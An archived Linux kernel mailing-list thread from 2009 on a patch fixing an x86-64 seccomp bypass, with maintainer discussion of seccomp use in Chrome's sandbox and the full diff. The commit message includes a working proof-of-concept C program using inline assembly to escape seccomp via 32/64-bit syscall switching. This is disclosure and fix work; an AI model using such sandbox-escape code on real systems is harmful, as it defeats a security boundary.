diff mbox

[2/2] x86-64: seccomp: fix 32/64 syscall hole

Message ID 20090228072554.CFEA6FC3DA@magilla.sf.frob.com
State Not Applicable
Delegated to: David Miller
Headers show

Commit Message

Roland McGrath Feb. 28, 2009, 7:25 a.m. UTC
> Ok, I can see what's going on. And it's disgusting.

That's what I thought when I saw TIF_32BIT in seccomp.

I did the simplest fix I could see touching only x86.

I don't know any other arch well enough to be sure that TIF_32BIT isn't the
wrong test there too.  I'd like to leave that worry to the arch maintainers.

But here is the patch you asked for.

Thanks,
Roland

---
[PATCH] x86-64: seccomp: fix 32/64 syscall hole

On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath <roland@redhat.com>
---
 arch/mips/include/asm/seccomp.h    |    1 -
 arch/powerpc/include/asm/compat.h  |    5 +++++
 arch/powerpc/include/asm/seccomp.h |    4 ----
 arch/sparc/include/asm/compat.h    |    5 +++++
 arch/sparc/include/asm/seccomp.h   |    6 ------
 arch/x86/include/asm/seccomp_32.h  |    6 ------
 arch/x86/include/asm/seccomp_64.h  |    8 --------
 kernel/seccomp.c                   |    7 ++++---
 8 files changed, 14 insertions(+), 28 deletions(-)

--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

Comments

Ingo Molnar Feb. 28, 2009, 7:31 a.m. UTC | #1
* Roland McGrath <roland@redhat.com> wrote:

> +#ifdef CONFIG_COMPAT
> +		if (is_compat_task())
>  			syscall = mode1_syscalls_32;
>  #endif

btw., shouldnt is_compat_task() expand to 0 in the 
!CONFIG_COMPAT case? That way we could remove this #ifdef too. 
(and move the first #ifdef inside the array initialization so 
that we always have a mode1_syscalls_32[] array.)

	Ingo
--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Roland McGrath Feb. 28, 2009, 7:36 a.m. UTC | #2
> btw., shouldnt is_compat_task() expand to 0 in the 
> !CONFIG_COMPAT case? That way we could remove this #ifdef too. 
> (and move the first #ifdef inside the array initialization so 
> that we always have a mode1_syscalls_32[] array.)

I guess you mean define it in linux/compat.h then?
Go right ahead.  Whatever you want is fine by me.


Thanks,
Roland
--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Linus Torvalds Feb. 28, 2009, 5:23 p.m. UTC | #3
On Fri, 27 Feb 2009, Roland McGrath wrote:
> 
> I don't know any other arch well enough to be sure that TIF_32BIT isn't the
> wrong test there too.  I'd like to leave that worry to the arch maintainers.

Agreed - it may be that others will want to not use TIF_32BIT too. It 
really does make much more sense to have it as a thread-local status flag 
than as an atomic (and thus expensive to modify) thread-flag, not just on 
x86.

But I think other architectures will find it easier to see what's going on 
if the code is straightforward and they can just fix their 
'is_compat_task()' function. And:

> But here is the patch you asked for.

Yes, this looks much more straightforward. 

And I guess the seccomp interaction means that this is potentially a 
2.6.29 thing. Not that I know whether anybody actually _uses_ seccomp. It 
does seem to be enabled in at least Fedora kernels, but it might not be 
used anywhere.

		Linus
--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Greg KH Feb. 28, 2009, 5:46 p.m. UTC | #4
On Sat, Feb 28, 2009 at 09:23:36AM -0800, Linus Torvalds wrote:
> On Fri, 27 Feb 2009, Roland McGrath wrote:
> > But here is the patch you asked for.
> 
> Yes, this looks much more straightforward. 
> 
> And I guess the seccomp interaction means that this is potentially a 
> 2.6.29 thing. Not that I know whether anybody actually _uses_ seccomp. It 
> does seem to be enabled in at least Fedora kernels, but it might not be 
> used anywhere.

It's enabled in SuSE kernels.

thanks,

greg k-h
--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Arjan van de Ven Feb. 28, 2009, 5:54 p.m. UTC | #5
On Sat, 28 Feb 2009 09:46:01 -0800
Greg KH <greg@kroah.com> wrote:

> On Sat, Feb 28, 2009 at 09:23:36AM -0800, Linus Torvalds wrote:
> > On Fri, 27 Feb 2009, Roland McGrath wrote:
> > > But here is the patch you asked for.
> > 
> > Yes, this looks much more straightforward. 
> > 
> > And I guess the seccomp interaction means that this is potentially
> > a 2.6.29 thing. Not that I know whether anybody actually _uses_
> > seccomp. It does seem to be enabled in at least Fedora kernels, but
> > it might not be used anywhere.
> 
> It's enabled in SuSE kernels.
> 

but are there users of it?
I thought Andrea stopped the cpushare thing that was the only user of
this....
Greg KH Feb. 28, 2009, 6:23 p.m. UTC | #6
On Sat, Feb 28, 2009 at 09:54:33AM -0800, Arjan van de Ven wrote:
> On Sat, 28 Feb 2009 09:46:01 -0800
> Greg KH <greg@kroah.com> wrote:
> 
> > On Sat, Feb 28, 2009 at 09:23:36AM -0800, Linus Torvalds wrote:
> > > On Fri, 27 Feb 2009, Roland McGrath wrote:
> > > > But here is the patch you asked for.
> > > 
> > > Yes, this looks much more straightforward. 
> > > 
> > > And I guess the seccomp interaction means that this is potentially
> > > a 2.6.29 thing. Not that I know whether anybody actually _uses_
> > > seccomp. It does seem to be enabled in at least Fedora kernels, but
> > > it might not be used anywhere.
> > 
> > It's enabled in SuSE kernels.
> > 
> 
> but are there users of it?
> I thought Andrea stopped the cpushare thing that was the only user of
> this....

I do not really know, but as it is enabled, we need to at least fix it.

thanks,

greg k-h
--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Greg KH Feb. 28, 2009, 8:27 p.m. UTC | #7
On Sat, Feb 28, 2009 at 10:23:13AM -0800, Greg KH wrote:
> On Sat, Feb 28, 2009 at 09:54:33AM -0800, Arjan van de Ven wrote:
> > On Sat, 28 Feb 2009 09:46:01 -0800
> > Greg KH <greg@kroah.com> wrote:
> > 
> > > On Sat, Feb 28, 2009 at 09:23:36AM -0800, Linus Torvalds wrote:
> > > > On Fri, 27 Feb 2009, Roland McGrath wrote:
> > > > > But here is the patch you asked for.
> > > > 
> > > > Yes, this looks much more straightforward. 
> > > > 
> > > > And I guess the seccomp interaction means that this is potentially
> > > > a 2.6.29 thing. Not that I know whether anybody actually _uses_
> > > > seccomp. It does seem to be enabled in at least Fedora kernels, but
> > > > it might not be used anywhere.
> > > 
> > > It's enabled in SuSE kernels.
> > > 
> > 
> > but are there users of it?
> > I thought Andrea stopped the cpushare thing that was the only user of
> > this....
> 
> I do not really know, but as it is enabled, we need to at least fix it.

Sorry, I ment "we" as in SuSE, not as the "community".  As the patch can
easily be backported to the SuSE kernels and resolved there, I don't
think it's something that probably needs to be backported for the
-stable tree either.

thanks,

greg k-h
--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Benjamin Herrenschmidt Feb. 28, 2009, 9:09 p.m. UTC | #8
On Sat, 2009-02-28 at 09:23 -0800, Linus Torvalds wrote:
> 
> On Fri, 27 Feb 2009, Roland McGrath wrote:
> > 
> > I don't know any other arch well enough to be sure that TIF_32BIT isn't the
> > wrong test there too.  I'd like to leave that worry to the arch maintainers.
> 
> Agreed - it may be that others will want to not use TIF_32BIT too. It 
> really does make much more sense to have it as a thread-local status flag 
> than as an atomic (and thus expensive to modify) thread-flag, not just on 
> x86.

FYI. _TIF_32BIT is the right test on powerpc (it's also what entry_64.S
tests to pick the appropriate syscall table).

Cheers,
Ben.


--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Roland McGrath March 2, 2009, 1:44 a.m. UTC | #9
> And I guess the seccomp interaction means that this is potentially a 
> 2.6.29 thing. Not that I know whether anybody actually _uses_ seccomp. It 
> does seem to be enabled in at least Fedora kernels, but it might not be 
> used anywhere.

I have no idea who uses it.  I just assume that anyone who is using it
might be expecting it to be reliable for security purposes as advertised.


Thanks,
Roland
--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Markus Gutschke (顧孟勤) May 6, 2009, 6:46 p.m. UTC | #10
On Sat, Feb 28, 2009 at 10:23, Linus Torvalds
<torvalds@linux-foundation.org> wrote:
> And I guess the seccomp interaction means that this is potentially a
> 2.6.29 thing. Not that I know whether anybody actually _uses_ seccomp. It
> does seem to be enabled in at least Fedora kernels, but it might not be
> used anywhere.

In the Linux version of Google Chrome, we are currently working on
code that will use seccomp for parts of our sandboxing solution.


Markus
--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Ingo Molnar May 6, 2009, 9:29 p.m. UTC | #11
* Markus Gutschke (顧孟勤) <markus@google.com> wrote:

> On Sat, Feb 28, 2009 at 10:23, Linus Torvalds
> <torvalds@linux-foundation.org> wrote:

> > And I guess the seccomp interaction means that this is 
> > potentially a 2.6.29 thing. Not that I know whether anybody 
> > actually _uses_ seccomp. It does seem to be enabled in at least 
> > Fedora kernels, but it might not be used anywhere.
> 
> In the Linux version of Google Chrome, we are currently working on 
> code that will use seccomp for parts of our sandboxing solution.

That's a pretty interesting usage. What would be fallback mode you 
are using if the kernel doesnt have seccomp built in? Completely 
non-sandboxed? Or a ptrace/PTRACE_SYSCALL based sandbox?

	Ingo
--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Markus Gutschke (顧孟勤) May 6, 2009, 9:46 p.m. UTC | #12
On Wed, May 6, 2009 at 14:29, Ingo Molnar <mingo@elte.hu> wrote:
> That's a pretty interesting usage. What would be fallback mode you
> are using if the kernel doesnt have seccomp built in? Completely
> non-sandboxed? Or a ptrace/PTRACE_SYSCALL based sandbox?

Ptrace has performance and/or reliability problems when used to
sandbox threaded applications due to potential race conditions when
inspecting system call arguments. We hope that we can avoid this
problem with seccomp. It is very attractive that kernel automatically
terminates any application that violates the very well-defined
constraints of the sandbox.

In general, we are currently exploring different options based on
general availability, functionality, and complexity of implementation.
Seccomp is a good middle ground that we expect to be able to use in
the medium term to provide an acceptable solution for a large segment
of Linux users. Although the restriction to just four unfiltered
system calls is painful.

We are still discussing what fallback options we have, and they are
likely on different schedules.

For instance, on platforms that have AppArmor or SELinux, we might be
able to use them as part of our sandboxing solution. Although we are
still investigating whether they meet all of our needs.


Markus
--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Ingo Molnar May 6, 2009, 9:54 p.m. UTC | #13
* Markus Gutschke (顧孟勤) <markus@google.com> wrote:

> On Wed, May 6, 2009 at 14:29, Ingo Molnar <mingo@elte.hu> wrote:
> > That's a pretty interesting usage. What would be fallback mode you
> > are using if the kernel doesnt have seccomp built in? Completely
> > non-sandboxed? Or a ptrace/PTRACE_SYSCALL based sandbox?
> 
> Ptrace has performance and/or reliability problems when used to 
> sandbox threaded applications due to potential race conditions 
> when inspecting system call arguments. We hope that we can avoid 
> this problem with seccomp. It is very attractive that kernel 
> automatically terminates any application that violates the very 
> well-defined constraints of the sandbox.
> 
> In general, we are currently exploring different options based on 
> general availability, functionality, and complexity of 
> implementation. Seccomp is a good middle ground that we expect to 
> be able to use in the medium term to provide an acceptable 
> solution for a large segment of Linux users. Although the 
> restriction to just four unfiltered system calls is painful.

Which other system calls would you like to use? Futexes might be 
one, for fast synchronization primitives?

	Ingo
--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Markus Gutschke (顧孟勤) May 6, 2009, 10:08 p.m. UTC | #14
On Wed, May 6, 2009 at 14:54, Ingo Molnar <mingo@elte.hu> wrote:
> Which other system calls would you like to use? Futexes might be
> one, for fast synchronization primitives?

There are a large number of system calls that "normal" C/C++ code uses
quite frequently, and that are not security sensitive. A typical
example would be gettimeofday(). But there are other system calls,
where the sandbox would not really need to inspect arguments as the
call does not expose any exploitable interface.

It is currently awkward that in order to use seccomp we have to
intercept all system calls and provide alternative implementations for
them; whereas we really only care about a comparatively small number
of security critical operations that we need to restrict.

Also, any redirected system call ends up incurring at least two
context switches, which is needlessly expensive for the large number
of trivial system calls. We are quite happy that read() and write(),
which are quite important to us, do not incur this penalty.


Markus
--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Ingo Molnar May 6, 2009, 10:13 p.m. UTC | #15
* Markus Gutschke (顧孟勤) <markus@google.com> wrote:

> On Wed, May 6, 2009 at 14:54, Ingo Molnar <mingo@elte.hu> wrote:
> > Which other system calls would you like to use? Futexes might be
> > one, for fast synchronization primitives?
> 
> There are a large number of system calls that "normal" C/C++ code 
> uses quite frequently, and that are not security sensitive. A 
> typical example would be gettimeofday(). But there are other 
> system calls, where the sandbox would not really need to inspect 
> arguments as the call does not expose any exploitable interface.
> 
> It is currently awkward that in order to use seccomp we have to 
> intercept all system calls and provide alternative implementations 
> for them; whereas we really only care about a comparatively small 
> number of security critical operations that we need to restrict.
> 
> Also, any redirected system call ends up incurring at least two 
> context switches, which is needlessly expensive for the large 
> number of trivial system calls. We are quite happy that read() and 
> write(), which are quite important to us, do not incur this 
> penalty.

doing a (per arch) bitmap of harmless syscalls and replacing the 
mode1_syscalls[] check with that in kernel/seccomp.c would be a 
pretty reasonable extension. (.config controllable perhaps, for 
old-style-seccomp)

It would probably be faster than the current loop over 
mode1_syscalls[] as well.

	Ingo
--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Markus Gutschke (顧孟勤) May 6, 2009, 10:21 p.m. UTC | #16
On Wed, May 6, 2009 at 15:13, Ingo Molnar <mingo@elte.hu> wrote:
> doing a (per arch) bitmap of harmless syscalls and replacing the
> mode1_syscalls[] check with that in kernel/seccomp.c would be a
> pretty reasonable extension. (.config controllable perhaps, for
> old-style-seccomp)
>
> It would probably be faster than the current loop over
> mode1_syscalls[] as well.

This would be a great option to improve performance of our sandbox. I
can detect the availability of the new kernel API dynamically, and
then not intercept the bulk of the system calls. This would allow the
sandbox to work both with existing and with newer kernels.

We'll post a kernel patch for discussion in the next few days,


Markus
--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Nicholas Miell May 7, 2009, 4:23 a.m. UTC | #17
On Wed, 2009-05-06 at 15:21 -0700, Markus Gutschke (顧孟勤) wrote:
> On Wed, May 6, 2009 at 15:13, Ingo Molnar <mingo@elte.hu> wrote:
> > doing a (per arch) bitmap of harmless syscalls and replacing the
> > mode1_syscalls[] check with that in kernel/seccomp.c would be a
> > pretty reasonable extension. (.config controllable perhaps, for
> > old-style-seccomp)
> >
> > It would probably be faster than the current loop over
> > mode1_syscalls[] as well.
> 
> This would be a great option to improve performance of our sandbox. I
> can detect the availability of the new kernel API dynamically, and
> then not intercept the bulk of the system calls. This would allow the
> sandbox to work both with existing and with newer kernels.
> 
> We'll post a kernel patch for discussion in the next few days,
> 

I suspect the correct thing to do would be to leave seccomp mode 1 alone
and introduce a mode 2 with a less restricted set of system calls -- the
interface was designed to be extended in this way, after all.
Roland McGrath May 7, 2009, 7:31 a.m. UTC | #18
> Ptrace has performance and/or reliability problems when used to
> sandbox threaded applications due to potential race conditions when
> inspecting system call arguments. We hope that we can avoid this
> problem with seccomp.

ptrace certainly has performance issues.  I take it the only "reliability
problems" you are talking about are MT races with modifications to user
memory that is relevant to a system call.  (Is there something else?)
That is not a "ptrace problem" per se at all.  It's an intrinsic problem
with any method based on "generic" syscall interception, if the filtering
and enforcement decisions depend on examining user memory.  By the same
token, no such method has a "reliability problem" if the filtering checks
only examine the registers (or other thread-synchronous state).

In the sense that I mean, seccomp is "generic syscall interception" too.
(That is, the checks/enforcement are "around" the call, rather than inside
it with direct atomicity controls binding the checks and uses together.)
The only reason seccomp does not have this "reliability problem" is that
its filtering is trivial and depends only on registers (in fact, only on
one register, the syscall number).

If you want to do checks that depend on shared or volatile state, then
syscall interception is really not the proper mechanism for you.  (Likely
examples include user memory, e.g. for file names in open calls, or ioctl
struct contents, etc., fd tables or filesystem details, etc.)  For that
you need mechanisms that look at stable kernel copies of user data that
are what the syscall will actually use, such as is done by audit, LSM, etc.

If you only have checks confined to thread-synchronous state such as the
user registers, then you don't have any "reliability problem" regardless
of the the particular syscall interception mechanism you use.  (ptrace has
many problems for this or any other purpose, but this is not one of them.)
That's unless you are referring to some other "reliability problem" that
I'm not aware of.  (And I'll leave aside the "is it registers or is it
user memory?" issue on ia64 as irrelevant, since, you know, it's ia64.)

If syscall interception is indeed an appropriate mechanism for your needs
and you want something tailored more specifically to your exact use in
future kernels, a module doing this would be easy to implement using the
utrace API.  (That might be a "compelling use" of utrace by virtue of the
Midas brand name effect, if nothing else. ;-)


Thanks,
Roland
--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Markus Gutschke (顧孟勤) May 7, 2009, 8:01 a.m. UTC | #19
On Thu, May 7, 2009 at 00:03, Roland McGrath <roland@redhat.com> wrote:
>
> That is not a "ptrace problem" per se at all.  It's an intrinsic problem
> with any method based on "generic" syscall interception, if the filtering
> and enforcement decisions depend on examining user memory.

Yes, this is indeed the main problem that we are aware of. It can be
avoided by suspending all threads during user memory inspection, but
that's a horrible price to pay (also: see below for an alternative
approach, that could in principle be adapted to use with ptrace)

> The only reason seccomp does not have this "reliability problem" is that
> its filtering is trivial and depends only on registers (in fact, only on
> one register, the syscall number).

Simplicity is really the beauty of seccomp. It is very easy to verify
that it does the right thing from a security point of view, because
any attempt to call unsafe system calls results in the kernel
terminating the program. This is much preferable over most ptrace
solutions which is more difficult to audit for correctness.

The downside is that the sandbox'd code needs to delegate execution of
most of its system calls to a monitor process. This is slow and rather
awkward. Although due to the magic of clone(), (almost) all system
calls can in fact be serialized, sent to the monitor process, have
their arguments safely inspected, and then executed on behalf of the
sandbox'd process. Details are tedious but we believe they are
solvable with current kernel APIs.

The other issue is performance. For system calls that are known to be
safe, we would rather not pay the penalty of redirecting them. A
kernel patch that made seccomp more efficient for these system calls
would be very welcome, and we will post such a patch for discussion
shortly.

> If you want to do checks that depend on shared or volatile state, then
> syscall interception is really not the proper mechanism for you.

We agree that syscall interception is a poor abstraction level for a
sandbox. But in the short term, we need to work with the APIs that are
available in today's kernels. And we believe that seccomp is one of
the more promising API that are currently available to us.


Markus
--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Ingo Molnar May 7, 2009, 10:11 a.m. UTC | #20
* Nicholas Miell <nmiell@comcast.net> wrote:

> On Wed, 2009-05-06 at 15:21 -0700, Markus Gutschke (顧孟勤) wrote:
> > On Wed, May 6, 2009 at 15:13, Ingo Molnar <mingo@elte.hu> wrote:
> > > doing a (per arch) bitmap of harmless syscalls and replacing the
> > > mode1_syscalls[] check with that in kernel/seccomp.c would be a
> > > pretty reasonable extension. (.config controllable perhaps, for
> > > old-style-seccomp)
> > >
> > > It would probably be faster than the current loop over
> > > mode1_syscalls[] as well.
> > 
> > This would be a great option to improve performance of our sandbox. I
> > can detect the availability of the new kernel API dynamically, and
> > then not intercept the bulk of the system calls. This would allow the
> > sandbox to work both with existing and with newer kernels.
> > 
> > We'll post a kernel patch for discussion in the next few days,
> > 
> 
> I suspect the correct thing to do would be to leave seccomp mode 1 
> alone and introduce a mode 2 with a less restricted set of system 
> calls -- the interface was designed to be extended in this way, 
> after all.

Yes, that is what i alluded to above via the '.config controllable' 
aspect.

Mode 2 could be implemented like this: extend prctl_set_seccomp() 
with a bitmap pointer, and copy it to a per task seccomp context 
structure.

a bitmap for 300 syscalls takes only about 40 bytes.

Please take care to implement nesting properly: if a seccomp context 
does a seccomp call (which mode 2 could allow), then the resulting 
bitmap should be the logical-AND of the parent and child bitmaps. 
There's no reason why seccomp couldnt be used in hiearachy of 
sandboxes, in a gradually less permissive fashion.

	Ingo
--
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Andi Kleen May 8, 2009, 7:18 p.m. UTC | #21
"Markus Gutschke (ÜÒÐ)" <markus@google.com> writes:
>
> There are a large number of system calls that "normal" C/C++ code uses
> quite frequently, and that are not security sensitive. A typical
> example would be gettimeofday().

At least on x86-64 gettimeofday() (and time(2)) work inside seccomp because 
they're vsyscalls that run in ring 3 only.

-Andi
Pavel Machek May 10, 2009, 5:37 a.m. UTC | #22
On Thu 2009-05-07 12:11:29, Ingo Molnar wrote:
> 
> * Nicholas Miell <nmiell@comcast.net> wrote:
> 
> > On Wed, 2009-05-06 at 15:21 -0700, Markus Gutschke (?????????) wrote:
> > > On Wed, May 6, 2009 at 15:13, Ingo Molnar <mingo@elte.hu> wrote:
> > > > doing a (per arch) bitmap of harmless syscalls and replacing the
> > > > mode1_syscalls[] check with that in kernel/seccomp.c would be a
> > > > pretty reasonable extension. (.config controllable perhaps, for
> > > > old-style-seccomp)
> > > >
> > > > It would probably be faster than the current loop over
> > > > mode1_syscalls[] as well.
> > > 
> > > This would be a great option to improve performance of our sandbox. I
> > > can detect the availability of the new kernel API dynamically, and
> > > then not intercept the bulk of the system calls. This would allow the
> > > sandbox to work both with existing and with newer kernels.
> > > 
> > > We'll post a kernel patch for discussion in the next few days,
> > > 
> > 
> > I suspect the correct thing to do would be to leave seccomp mode 1 
> > alone and introduce a mode 2 with a less restricted set of system 
> > calls -- the interface was designed to be extended in this way, 
> > after all.
> 
> Yes, that is what i alluded to above via the '.config controllable' 
> aspect.
> 
> Mode 2 could be implemented like this: extend prctl_set_seccomp() 
> with a bitmap pointer, and copy it to a per task seccomp context 
> structure.
> 
> a bitmap for 300 syscalls takes only about 40 bytes.
> 
> Please take care to implement nesting properly: if a seccomp context 
> does a seccomp call (which mode 2 could allow), then the resulting 
> bitmap should be the logical-AND of the parent and child bitmaps. 
> There's no reason why seccomp couldnt be used in hiearachy of 
> sandboxes, in a gradually less permissive fashion.

I don't think seccomp nesting (at kernel level) has any value.

First, syscalls are wrong level of abstraction for sandboxing. There
are multiple ways to read from file, for example.

If you wanted to do hierarchical sandboxes, asking your monitor to
restrict your seccomp mask would seem like a way to go...
								Pavel
diff mbox

Patch

diff --git a/arch/mips/include/asm/seccomp.h b/arch/mips/include/asm/seccomp.h
index 36ed440..a6772e9 100644
--- a/arch/mips/include/asm/seccomp.h
+++ b/arch/mips/include/asm/seccomp.h
@@ -1,6 +1,5 @@ 
 #ifndef __ASM_SECCOMP_H
 
-#include <linux/thread_info.h>
 #include <linux/unistd.h>
 
 #define __NR_seccomp_read __NR_read
diff --git a/arch/powerpc/include/asm/compat.h b/arch/powerpc/include/asm/compat.h
index d811a8c..4774c2f 100644
--- a/arch/powerpc/include/asm/compat.h
+++ b/arch/powerpc/include/asm/compat.h
@@ -210,5 +210,10 @@  struct compat_shmid64_ds {
 	compat_ulong_t __unused6;
 };
 
+static inline int is_compat_task(void)
+{
+	return test_thread_flag(TIF_32BIT);
+}
+
 #endif /* __KERNEL__ */
 #endif /* _ASM_POWERPC_COMPAT_H */
diff --git a/arch/powerpc/include/asm/seccomp.h b/arch/powerpc/include/asm/seccomp.h
index 853765e..00c1d91 100644
--- a/arch/powerpc/include/asm/seccomp.h
+++ b/arch/powerpc/include/asm/seccomp.h
@@ -1,10 +1,6 @@ 
 #ifndef _ASM_POWERPC_SECCOMP_H
 #define _ASM_POWERPC_SECCOMP_H
 
-#ifdef __KERNEL__
-#include <linux/thread_info.h>
-#endif
-
 #include <linux/unistd.h>
 
 #define __NR_seccomp_read __NR_read
diff --git a/arch/sparc/include/asm/compat.h b/arch/sparc/include/asm/compat.h
index f260b58..0e70625 100644
--- a/arch/sparc/include/asm/compat.h
+++ b/arch/sparc/include/asm/compat.h
@@ -240,4 +240,9 @@  struct compat_shmid64_ds {
 	unsigned int	__unused2;
 };
 
+static inline int is_compat_task(void)
+{
+	return test_thread_flag(TIF_32BIT);
+}
+
 #endif /* _ASM_SPARC64_COMPAT_H */
diff --git a/arch/sparc/include/asm/seccomp.h b/arch/sparc/include/asm/seccomp.h
index 7fcd996..adca1bc 100644
--- a/arch/sparc/include/asm/seccomp.h
+++ b/arch/sparc/include/asm/seccomp.h
@@ -1,11 +1,5 @@ 
 #ifndef _ASM_SECCOMP_H
 
-#include <linux/thread_info.h> /* already defines TIF_32BIT */
-
-#ifndef TIF_32BIT
-#error "unexpected TIF_32BIT on sparc64"
-#endif
-
 #include <linux/unistd.h>
 
 #define __NR_seccomp_read __NR_read
diff --git a/arch/x86/include/asm/seccomp_32.h b/arch/x86/include/asm/seccomp_32.h
index a6ad87b..b811d6f 100644
--- a/arch/x86/include/asm/seccomp_32.h
+++ b/arch/x86/include/asm/seccomp_32.h
@@ -1,12 +1,6 @@ 
 #ifndef _ASM_X86_SECCOMP_32_H
 #define _ASM_X86_SECCOMP_32_H
 
-#include <linux/thread_info.h>
-
-#ifdef TIF_32BIT
-#error "unexpected TIF_32BIT on i386"
-#endif
-
 #include <linux/unistd.h>
 
 #define __NR_seccomp_read __NR_read
diff --git a/arch/x86/include/asm/seccomp_64.h b/arch/x86/include/asm/seccomp_64.h
index 4171bb7..84ec1bd 100644
--- a/arch/x86/include/asm/seccomp_64.h
+++ b/arch/x86/include/asm/seccomp_64.h
@@ -1,14 +1,6 @@ 
 #ifndef _ASM_X86_SECCOMP_64_H
 #define _ASM_X86_SECCOMP_64_H
 
-#include <linux/thread_info.h>
-
-#ifdef TIF_32BIT
-#error "unexpected TIF_32BIT on x86_64"
-#else
-#define TIF_32BIT TIF_IA32
-#endif
-
 #include <linux/unistd.h>
 #include <asm/ia32_unistd.h>
 
diff --git a/kernel/seccomp.c b/kernel/seccomp.c
index ad64fcb..57d4b13 100644
--- a/kernel/seccomp.c
+++ b/kernel/seccomp.c
@@ -8,6 +8,7 @@ 
 
 #include <linux/seccomp.h>
 #include <linux/sched.h>
+#include <linux/compat.h>
 
 /* #define SECCOMP_DEBUG 1 */
 #define NR_SECCOMP_MODES 1
@@ -22,7 +23,7 @@  static int mode1_syscalls[] = {
 	0, /* null terminated */
 };
 
-#ifdef TIF_32BIT
+#ifdef CONFIG_COMPAT
 static int mode1_syscalls_32[] = {
 	__NR_seccomp_read_32, __NR_seccomp_write_32, __NR_seccomp_exit_32, __NR_seccomp_sigreturn_32,
 	0, /* null terminated */
@@ -37,8 +38,8 @@  void __secure_computing(int this_syscall)
 	switch (mode) {
 	case 1:
 		syscall = mode1_syscalls;
-#ifdef TIF_32BIT
-		if (test_thread_flag(TIF_32BIT))
+#ifdef CONFIG_COMPAT
+		if (is_compat_task())
 			syscall = mode1_syscalls_32;
 #endif
 		do {